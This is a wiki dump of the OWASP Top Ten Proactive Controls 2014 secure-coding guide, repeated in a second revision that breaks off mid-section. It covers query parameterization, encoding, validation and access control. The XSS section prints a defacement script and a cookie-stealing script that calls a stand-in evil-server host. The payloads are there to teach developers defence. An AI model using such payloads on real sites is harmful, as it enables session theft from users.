Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. And even when they do, there may be inherent flaws in requirements and designs. When it comes to web security, developers are often set up to lose the security game.<br />
<br />
The OWASP Top Ten Proactive Controls is a list of security techniques that should be included in every software development project. This document was written by developers for developers to assist those new to secure development.<br />
<br />
* 1: Parameterize Queries<br />
* 2: Encode Data<br />
* 3: Validate All Inputs<br />
* 4: Implement Appropriate Access Controls<br />
* 5: Establish Identity and Authentication Controls<br />
* 6: Protect Data and Privacy<br />
* 7: Implement Logging, Error Handling and Intrusion Detection<br />
* 8: Leverage Security Features of Frameworks and Security Libraries<br />
* 9: Include Security-Specific Requirements<br />
* 10: Design and Architect Security In<br />
<br />
For more information, see the complete document in the tab to the right.<br />
<br />
==Licensing==<br />
<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is This? ==<br />
<br />
The OWASP Top Ten Proactive Controls describes the top control and control categories that every architect and developer should absolutely, 100% include in every project.<br />
<br />
== Project Leaders ==<br />
<br />
* [https://www.owasp.org/index.php/User:Jmanico Jim Manico] [mailto:jim.manico@owasp.org @]<br />
* [https://www.owasp.org/index.php/User:Jim_Bird Jim Bird] [mailto:jimbird@shaw.ca @]<br />
<br />
== Key Contributors ==<br />
<br />
* Danny Harris [mailto:danny.harris@owasp.org @]<br />
* Stephen de Vries<br />
* Andrew Van Der Stock<br />
* Gaz Heyes<br />
* Colin Watson<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[OWASP Mobile Security Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== Quick Access ==<br />
<br />
* Top Ten Proactive Controls 2014 [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls full description].<br />
<br />
== News and Events ==<br />
* [10 Mar 2014] [http://lists.owasp.org/pipermail/owasp-leaders/2014-March/011047.html Request for review]<br />
* [04 Feb 2014] New Wiki Template!<br />
<br />
== Mailing List ==<br />
<br />
Keep up-to-date via the [https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List].<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten Proactive Controls 2014. <br />
<br />
<br />
== 1: Parameterize Queries ==<br />
<br />
SQL Injection is one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of Query Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
'''Key References'''<br />
* [[Query Parameterization Cheat Sheet]]<br />
* [https://www.owasp.org/index.php/OWASP_Secure_Coding_Practices_-_Quick_Reference_Guide OWASP Secure Coding Practices Quick Reference Guide]<br />
<br />
<br />
== 2: Encode Data ==<br />
<br />
Encoding is a powerful mechanism to help protect against many types of attack, especially injection attacks. Essentially, encoding involves translating special characters into some equivalent that is no longer significant in the target interpreter. A specific example of encoding is output encoding necessary to prevent Cross Site Scripting. <br />
<br />
Web developers often build web pages dynamically, consisting of a mix of developer built HTML/JavaScript and database data that was originally populated with user input. This input should be considered to be untrusted data and dangerous, which requires special handling when building a secure web application. Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in the user's browser and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
Contextual output encoding is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML. Forms of encoding needing to stop XSS include HTML Entity Encoding, JavaScript Encoding and Percent Encoding (aka URL Encoding). Encoding needed to stop other forms of injection include Unix encoding, Windows encoding, LDAP encoding, XML encoding and others. OWASP's Enterprise Security API (ESAPI) provides encoders for these functions in Java. In .NET 4.5, the [http://msdn.microsoft.com/en-us/library/system.web.security.antixss.antixssencoder%28v=vs.110%29.aspx AntiXssEncoder Class] provides CSS, HTML, URL, JavaScriptString and XML encoders - other encoders for LDAP and VBScript are included in the open source AntiXSS library.<br />
<br />
'''Key References'''<br />
* Stopping XSS in your web application: OWASP [[XSS (Cross Site Scripting) Prevention Cheat Sheet]]<br />
* General information about injection: [[Top 10 2013-A1-Injection]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_Java_Encoder_Project OWASP Java Encoder Project]<br />
* [http://msdn.microsoft.com/en-us/security/aa973814.aspx Microsoft .NET AntiXSS Library]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API OWASP ESAPI]<br />
* [https://www.owasp.org/index.php/OWASP_Encoder_Comparison_Reference_Project OWASP Encoder Comparison Reference Project]<br />
<br />
<br />
== 3: Validate All Inputs ==<br />
<br />
It is critical to treat all input from outside of the application (for example, from browsers or mobile clients, from outside systems or files) as untrusted. For web applications this includes HTTP headers, cookies, and GET and POST parameters: any or all of this data could be compromised by an attacker.<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation is most often built into web applications in server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern. Secure programmers can use regular expressions to help define what good user input should look like.<br />
<br />
There are two types of input validation: “white list" validation and "black list" validation. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or bad characters. “Black list” validation is much more difficult to build into your applications effectively because it can be bypassed through encoding and other obfuscation techniques, and is not recommended when building a secure web application. The following examples will focus on white list validation examples.<br />
<br />
When a user first registers for an account with our web application, some of the first things we ask a user to provide for us would be a username, password and email address. If this input came from a malicious user, the input could contain dangerous attacks that could harm our web application! One of the ways we can make attacking this web application more difficult is to use regular expressions to validate the user input from this form.<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation white list of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” especially when dealing with “open text input” where complete sentences from users need to be accepted.<br />
<br />
'''Key References''' <br />
* [[Input Validation Cheat Sheet]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_JSON_Sanitizer OWASP JSON Sanitizer Project]<br />
* [https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer OWASP Java HTML Sanitizer Project]<br />
* [http://commons.apache.org/proper/commons-validator/ Apache Commons Validator]<br />
<br />
<br />
== 4: Implement Appropriate Access Controls ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular feature of resource should be granted or denied. It should be noted that authorization is not equivalent to authentication (verifying identity). These terms and their definitions are frequently confused. <br />
<br />
Access Control can be a rather complex and design-heavy security control. The following "positive" access control design requirements should be considered at the initial stages of application development. Once you have chosen a specific access control design pattern, it is often difficult and time consuming to re-engineer access control in your application with a new pattern. Access Control is one of the main areas of application security software design that must be heavily thought-through up front. <br />
<br />
=== Force all requests to go through access control checks ===<br />
Most frameworks and languages only check a feature for access control if a programmer adds that check. The opposite is a more security-centric design. Consider using a filter or other automatic mechanism to ensure that all requests go through some kind of access control check.<br />
<br />
=== Deny by default ===<br />
In line with automatic access control checking, consider denying all access control checks for features that have not been configured for access control. Normally the opposite is true in that newly created features automatically grant users full access until a developer has added that check. <br />
<br />
=== Avoid hard-coded policy-based access control checks in code ===<br />
Very often, access control policy is hard-coded deep in application code. This makes auditing or proving the security of that software very difficult and time consuming. Access control policy and application code, when possible, should be separated. Another way of saying this is that your enforcement layer (checks in code) and your access control decision making process (the access control "engine") should be separated when possible. <br />
<br />
=== Code to the activity ===<br />
Most web frameworks use role based access control as the primary method for coding enforcement points in code. While it's acceptable to use roles in access control mechanisms, coding specifically to the role in application code is an anti-pattern. Considering checking if the user has access to that feature in code, as opposed to checking what role the user is in code.<br />
<br />
=== Server-side trusted data should drive access control ===<br />
The vast majority of data you need to make an access control decision (who is the user and are they logged in, what entitlements does the user have, what is the access control policy, what feature and data is being requested, what time is it, what geolocation is it, etc) should be retrieved "server-side" in a standard web or web service application. Policy data such as a user's role or an access control rule should never be part of the request. In a standard web application, the only client-side data that is needed for access control is the id or ids of the data being accessed. Most all other data needed to make an access control decision should be retrieved server-side.<br />
<br />
'''Key References'''<br />
* [[Access Control Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [https://www.owasp.org/index.php/OWASP_PHPRBAC_Project OWASP PHPRBAC Project]<br />
* [http://shiro.apache.org/authorization-features.html Apache Shiro Authorization features]<br />
<br />
<br />
== 5: Establish Identity and Authentication Controls ==<br />
<br />
Authentication is the process of verifying that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forward between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
'''Key References'''<br />
* [[Authentication Cheat Sheet]]<br />
* [[Password Storage Cheat Sheet]]<br />
* [[Forgot Password Cheat Sheet]] <br />
* [[Session Management Cheat Sheet]]<br />
<br />
<br />
== 6: Protect Data and Privacy ==<br />
<br />
=== Use Encryption in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. <br />
<br />
'''Key References'''<br />
* Proper SSL/TLS configuration: [[Transport Layer Protection Cheat Sheet]]<br />
* Protecting users from man-in-the-middle attacks via fraudulent SSL certificates: [[Pinning Cheat Sheet]]<br />
<br />
=== Use Encryption at Rest ===<br />
<br />
Cryptographic storage is difficult to build securely. It's critical to classify data in your system and determine that data needs to be encrypted, such as the need to encrypt credit cards per the PCI compliance standard. Also, any time you start building your own low-level crypto on your own, ensure you are or have the assistance of a deep applied crypto expert. Consider well vetted cryptographic libraries such as the [https://code.google.com/p/keyczar/ Google KeyCzar] project. Also, be prepared to handle the more difficult aspects of applied crypto such as key management, overall cryptographic architecture design as well as tiering and trust issues in complex software. <br />
<br />
'''Key References'''<br />
* Information on low level decisions necessary when encrypting data at rest: [[Cryptographic Storage Cheat Sheet]] <br />
* [[Password Storage Cheat Sheet]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/O-Saft OWASP SSL Audit for Testers]<br />
* [https://code.google.com/p/keyczar/ Google KeyCzar]<br />
<br />
=== Implement Protection in Process ===<br />
<br />
Make sure that confidential or sensitive data is not exposed by accident during processing. It may be more accessible in memory; it may be stored in temporary locations or in logs.<br />
<br />
<br />
== 7: Implement Logging and Intrusion Detection ==<br />
<br />
Application logging should not be an afterthought or limited to debugging and troubleshooting. Logging is also used in other important activities:<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
Use a common logging approach to ensure that all log entries are consistent, and contain essential information including source and timestamp.<br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
It is important not to log too much, or too little - be careful not to log private or confidential data or secrets. Use knowledge of the intended purposes to guide what, when and how much. To protect from Log Injection aka Log Forging, make sure to perform validation or encoding on untrusted data before logging it.<br />
<br />
The [[OWASP AppSensor Project]] is a conceptual framework and methodology that offers prescriptive guidance to implement intrusion detection and automated response into an existing application: where to add sensors or [https://www.owasp.org/index.php/AppSensor_DetectionPoints detection points] and what [https://www.owasp.org/index.php/AppSensor_ResponseActions response actions] to take when an exception is encountered in your application.<br />
<br />
<br />
'''Key References'''<br />
* How to properly implement logging in an application: [[Logging Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [[OWASP AppSensor Project]]<br />
<br />
<br />
== 8: Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* [http://static.springsource.org/spring-security/site/index.html Spring Security]<br />
* [http://shiro.apache.org/ Apache Shiro]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet PHP Security Cheat Sheet]<br />
* [https://www.owasp.org/index.php/.NET_Security_Cheat_Sheet .NET Security Cheat Sheet]<br />
<br />
<br />
== 9: Include Security-Specific Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use cases or user stories which include input, behavior and output, and can be reviewed and tested for functional correctness by Q/A staff. For example, checking for re-authentication during change password or checking to make sure that changes to certain data were properly logged.<br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features include multi-step multi-branch workflows that are difficult to evaluate thoroughly and involve money or valuable items, user credentials, private information or command/control functions, for example eCommerce workflows, shipping route choices, or banking transfer validation. The user stories or use cases for these requirements should include exceptions and failure scenarios (what happens if a step fails or times out or if the user tries to cancel or repeat a step?) and requirements derived from "abuse cases". Abuse cases describe how the application's functions could be subverted by attackers. Walking through failures and abuse case scenarios will uncover weaknesses in validation and error handling that impact the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must always be aware of any personal or confidential information in the system and make sure that this data is protected. What is the source of the data? Can the source be trusted? Where is the data stored or displayed? Does it have to be stored or displayed? Who is authorized to create it, see it, change it, and is all of this tracked? This will drive the need for data validation, access control, encryption, and auditing and logging controls in the system.<br />
<br />
'''Key References'''<br />
* [[OWASP Application Security Verification Standard Project]]<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model]<br />
* [[Business Logic Security Cheat Sheet]]<br />
* [[Testing for business logic (OWASP-BL-001)]]<br />
<br />
<br />
== 10: Design and Architect Security In ==<br />
<br />
There are several areas where you need to be concerned about security in the architecture and design of a system. These include:<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team must understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls to enforce at the client, the web layer, the business logic layer, the data management layer, and where to establish trust between different systems or different parts of the same system. Trust boundaries determine where to make decisions about authentication, access control, data validation and encoding, encryption and logging. Data, sources of data and services inside a trust boundary can be trusted - anything outside of a trust boundary cannot be. When designing or changing the design or a system, make sure to understand assumptions about trust, make sure that these assumptions are valid, and make sure that they are followed consistently.<br />
<br />
3) '''Manage the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (should you do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model (OpenSAMM)]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project Application Security Verification Standard Project]<br />
* [https://www.owasp.org/index.php/Application_Security_Architecture_Cheat_Sheet Application Security Architecture Cheat Sheet]<br />
* [[Attack Surface Analysis Cheat Sheet]]<br />
* [[Threat Modeling Cheat Sheet]]<br />
<br />
= Formal Numbering =<br />
<br />
* OWASP-C1: Parameterize Queries<br />
* OWASP-C2: Encode Data<br />
* OWASP-C3: Validate All Inputs<br />
* OWASP-C4: Implement Appropriate Access Controls<br />
* OWASP-C5: Establish Identity and Authentication Controls<br />
* OWASP-C6: Protect Data and Privacy<br />
* OWASP-C7: Implement Logging, Error Handling and Intrusion Detection<br />
* OWASP-C8: Leverage Security Features of Frameworks and Security Libraries<br />
* OWASP-C9: Include Security-Specific Requirements<br />
* OWASP-C10: Design and Architect Security In<br />
<br />
= Project Roadmap =<br />
<br />
Welcome to the OWASP Top 10 Proactive Controls Project! <br />
<br />
== Roadmap ==<br />
<br />
End of July: Release final document in well designed PDF form<br />
<br />
== Status ==<br />
<br />
March 10, 2014: We released an early beta of this document to the OWASP leaders list for review and commentary.<br/><br />
February 3, 2014: We are currently working towards a beta release of this document and have begun working with a designer for the final release PDF.<br />
<br />
__NOTOC__ <headertabs /><br />
<br />
[[Category:OWASP_Project|OWASP Proactive Controls]] [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]] [[Category:OWASP_Document]]</div>Jim Birdhttps://wiki.owasp.org/index.php?title=OWASP_Proactive_Controls&diff=176680OWASP Proactive Controls2014-06-09T16:15:01Z<p>Jim Bird: </p>
<hr />
<div>= Main = <br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:Proactive-header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== OWASP Proactive Controls ==<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. And even when they do, there may be inherent flaws in requirements and designs. When it comes to web security, developers are often set up to lose the security game.<br />
<br />
The OWASP Top Ten Proactive Controls is a list of security techniques that should be included in every software development project. This document was written by developers for developers to assist those new to secure development.<br />
<br />
* 1: Parameterize Queries<br />
* 2: Encode Data<br />
* 3: Validate All Inputs<br />
* 4: Implement Appropriate Access Controls<br />
* 5: Establish Identity and Authentication Controls<br />
* 6: Protect Data and Privacy<br />
* 7: Implement Logging, Error Handling and Intrusion Detection<br />
* 8: Leverage Security Features of Frameworks and Security Libraries<br />
* 9: Include Security-Specific Requirements<br />
* 10: Design and Architect Security In<br />
<br />
For more information, see the complete document in the tab to the right.<br />
<br />
==Licensing==<br />
<br />
The OWASP Proactive Controls document is free to use under the [https://creativecommons.org/licenses/by-sa/3.0/us/ Creative Commons ShareAlike 3 License].<br />
<br />
| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |<br />
<br />
== What is This? ==<br />
<br />
The OWASP Top Ten Proactive Controls describes the top control and control categories that every architect and developer should absolutely, 100% include in every project.<br />
<br />
== Project Leaders ==<br />
<br />
* [https://www.owasp.org/index.php/User:Jmanico Jim Manico] [mailto:jim.manico@owasp.org @]<br />
* [https://www.owasp.org/index.php/User:Jim_Bird Jim Bird] [mailto:jimbird@shaw.ca @]<br />
<br />
== Key Contributors ==<br />
<br />
* Danny Harris [mailto:danny.harris@owasp.org @]<br />
* Stephen de Vries<br />
* Andrew Van Der Stock<br />
* Gaz Heyes<br />
* Colin Watson<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[OWASP Mobile Security Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== Quick Access ==<br />
<br />
* Top Ten Proactive Controls 2014 [https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Top_Ten_Proactive_Controls full description].<br />
<br />
== News and Events ==<br />
* [10 Mar 2014] [http://lists.owasp.org/pipermail/owasp-leaders/2014-March/011047.html Request for review]<br />
* [04 Feb 2014] New Wiki Template!<br />
<br />
== Mailing List ==<br />
<br />
Keep up-to-date via the [https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List].<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten Proactive Controls 2014. <br />
<br />
<br />
== 1: Parameterize Queries ==<br />
<br />
SQL Injection is one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped, modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of Query Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$ id’= $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
'''Key References'''<br />
* [[Query Parameterization Cheat Sheet]]<br />
* [https://www.owasp.org/index.php/OWASP_Secure_Coding_Practices_-_Quick_Reference_Guide OWASP Secure Coding Practices Quick Reference Guide]<br />
<br />
<br />
== 2: Encode Data ==<br />
<br />
Encoding is a powerful mechanism to help protect against many types of attack, especially injection attacks. Essentially, encoding involves translating special characters into some equivalent that is no longer significant in the target interpreter. A specific example of encoding is output encoding necessary to prevent Cross Site Scripting. <br />
<br />
Web developers often build web pages dynamically, consisting of a mix of developer built HTML/JavaScript and database data that was originally populated with user input. This input should be considered to be untrusted data and dangerous, which requires special handling when building a secure web application. Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in the user's browser and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;hxxp://<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will already be logged into the site when the attack is executed. Reflected XSS occurs when the attacker places an XSS attack at the end of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since the victim needs to be tricked into visiting the dangerous link and must already be logged into the site.<br />
<br />
